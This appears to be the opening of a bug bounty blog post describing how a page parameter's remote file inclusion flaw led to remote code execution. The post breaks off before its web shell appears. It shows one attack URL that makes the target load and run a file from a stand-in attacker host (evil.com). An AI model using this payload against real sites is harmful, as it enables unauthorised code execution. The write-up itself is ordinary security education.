Member-only story
๐ฐ How a Simple RFI Turned into a $300 RCE Jackpot โ A Hackerโs Wild Ride! ๐
๐ฅ Introduction
Imagine sipping on coffee โ, casually testing a website, when suddenly โ ๐ฅ BAM! โ you find an RFI vulnerability (Remote File Inclusion). Exciting, right? But what if that tiny spark of curiosity led you down a rabbit hole ๐ณ๏ธ, turning into Remote Code Execution (RCE) and earning you a sweet $300 bug bounty? ๐ค This is the story of how a simple vulnerability turned into an unforgettable hacking adventure! ๐ฏ
๐ Step 1: The Accidental Discovery
It all started on a lazy afternoon. ๐ค๏ธ I was exploring a bug bounty program when I stumbled upon a parameter in a URL:
**https://target.com/index.php?page=about.php**This looked too good to be true! A page parameter? That screamed potential RFI. So, I did what any hacker would โ I tested it! ๐ต๏ธโโ๏ธ
๐ Step 2: Exploiting the RFI
To confirm the vulnerability, I tried including a remote file:
**https://target.com/index.php?page=http://evil.com/shell.txt**And guess what? The server fetched and executed my remote file! ๐ฏ That was a huge win! But I wasnโt stopping there. ๐
โ ๏ธ Step 3: From RFI to RCE
Since the server executed my remote file, I crafted a simple PHP web shell ๐:
